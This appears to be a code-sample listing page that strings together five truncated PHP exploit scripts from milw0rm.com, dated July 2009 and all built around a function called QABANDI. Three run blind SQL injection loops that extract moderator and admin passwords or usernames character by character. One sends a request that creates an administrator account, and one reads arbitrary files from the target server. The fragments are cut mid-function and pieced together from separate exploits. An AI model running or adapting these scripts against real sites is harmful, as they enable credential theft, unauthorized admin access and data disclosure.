Пример #1
0
            if ($i == 60) {
                $i = 98;
            }
            if ($j > 9) {
                $hg = QABANDI($host1, $userdir1, $userid1, $username1, $userpass1, "' and ascii(substring((select Password from almnzm_moderators limit 0,1)," . $j . ",1)) > '" . $i);
            }
            if ($j <= 9) {
                $hg = QABANDI($host1, $userdir1, $userid1, $username1, $userpass1, "' and ascii(substring((select Password from almnzm_moderators limit 0,1)," . $j . ",1))>'" . $i);
            }
            $laenge = strlen($hg);
            if (abs(100 - $laenge / $r * 100) > $t - 1) {
                if ($j > 9) {
                    $laenge = strlen(QABANDI($host1, $userdir1, $userid1, $username1, $userpass1, "' and ascii(substring((select Password from almnzm_moderators limit 0,1)," . $j . ",1)) > '" . ($i - 1)));
                }
                if ($j <= 9) {
                    $laenge = strlen(QABANDI($host1, $userdir1, $userid1, $username1, $userpass1, "' and ascii(substring((select Password from almnzm_moderators limit 0,1)," . $j . ",1))>'" . ($i - 1)));
                }
                if (abs(100 - $laenge / $r * 100) > $t - 1) {
                    echo chr($i - 1);
                } else {
                    echo chr($i);
                }
                $i = 102;
            }
        }
    }
}
?>

# milw0rm.com [2009-07-02]
Пример #2
0
    }
}
for ($i = 1; $i <= 122; $i++) {
    $qest = QAB_GET(QABANDI($host1, $userdir1, "' or ascii(substring((select password from songs_user limit 0,1),10,1))='" . $i));
    if ($qest == $truths) {
        echo chr($i);
    }
}
for ($i = 1; $i <= 122; $i++) {
    $qest = QAB_GET(QABANDI($host1, $userdir1, "' or ascii(substring((select password from songs_user limit 0,1),11,1))='" . $i));
    if ($qest == $truths) {
        echo chr($i);
    }
}
for ($i = 1; $i <= 122; $i++) {
    $qest = QAB_GET(QABANDI($host1, $userdir1, "' or ascii(substring((select password from songs_user limit 0,1),12,1))='" . $i));
    if ($qest == $truths) {
        echo chr($i);
    }
}
for ($i = 1; $i <= 122; $i++) {
    $qest = QAB_GET(QABANDI($host1, $userdir1, "' or ascii(substring((select password from songs_user limit 0,1),13,1))='" . $i));
    if ($qest == $truths) {
        echo chr($i);
    }
}
echo "\n\n this exploit is made to give you the first 8 chars of username and first 13 of password";
?>

# milw0rm.com [2009-07-27]
Пример #3
0
    //print $packet;
    $o = @fsockopen($host, 80);
    if (!$o) {
        echo "\n[x] No response...\n";
        die;
    }
    fputs($o, $packet);
    while (!feof($o)) {
        $data .= fread($o, 1024);
    }
    fclose($o);
    $_404 = strstr($data, "HTTP/1.1 404 Not Found");
    if (!empty($_404)) {
        echo "\n[x] 404 Not Found... Make sure of path. \n";
        die;
    }
    $_401 = strstr($data, "401 Authorization Required");
    if (!empty($_401)) {
        echo "\n[x] HTTP authentication detected! (mrakib jdar narry, maku faydeh) \n";
        die;
    }
    echo "Admin created !\n\nUsername: qabandi\npassword: qabandi";
}
$host1 = $argv[1];
$userdir1 = $argv[2];
QABANDI($host1, $userdir1);
die;
?>

# milw0rm.com [2009-07-15]
Пример #4
0
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
    $packet .= "Pragma: no-cache\r\n";
    $packet .= "Connection: Close\r\n\r\n";
    $o = @fsockopen($host, 80);
    if (!$o) {
        echo "\n[x] No response...\n";
        die;
    }
    fputs($o, $packet);
    while (!feof($o)) {
        $data .= fread($o, 1024);
    }
    fclose($o);
    $_404 = strstr($data, "HTTP/1.1 404 Not Found");
    if (!empty($_404)) {
        echo "\n[x] 404 Not Found... Make sure of path. \n";
        die;
    }
    return $data;
}
$host1 = $argv[1];
$userdir1 = $argv[2];
$file = $argv[3];
if ($argc > 2) {
    echo "Getting file Data....[i9bir]\n";
    print_r(QABANDI($host1, $userdir1, $file));
}
?>

# milw0rm.com [2009-07-24]
Пример #5
0
    }
}
for ($i = 46; $i <= 122; $i++) {
    $ass = "' and ascii(substring((select admin_user from admin limit 0,1),8,1))='" . $i;
    $zyklon = strlen(QABANDI($host1, $userdir1, $ass));
    $zyklon = round($zyklon, -3);
    if ($zyklon == $yes) {
        echo chr($i);
    }
}
for ($i = 46; $i <= 122; $i++) {
    $ass = "' and ascii(substring((select admin_user from admin limit 0,1),9,1))='" . $i;
    $zyklon = strlen(QABANDI($host1, $userdir1, $ass));
    $zyklon = round($zyklon, -3);
    if ($zyklon == $yes) {
        echo chr($i);
    }
}
for ($i = 46; $i <= 122; $i++) {
    $ass = "' and ascii(substring((select admin_user from admin limit 0,1),10,1))='" . $i;
    $zyklon = strlen(QABANDI($host1, $userdir1, $ass));
    $zyklon = round($zyklon, -3);
    if ($zyklon == $yes) {
        echo chr($i);
    }
}
die;
?>

# milw0rm.com [2009-07-14]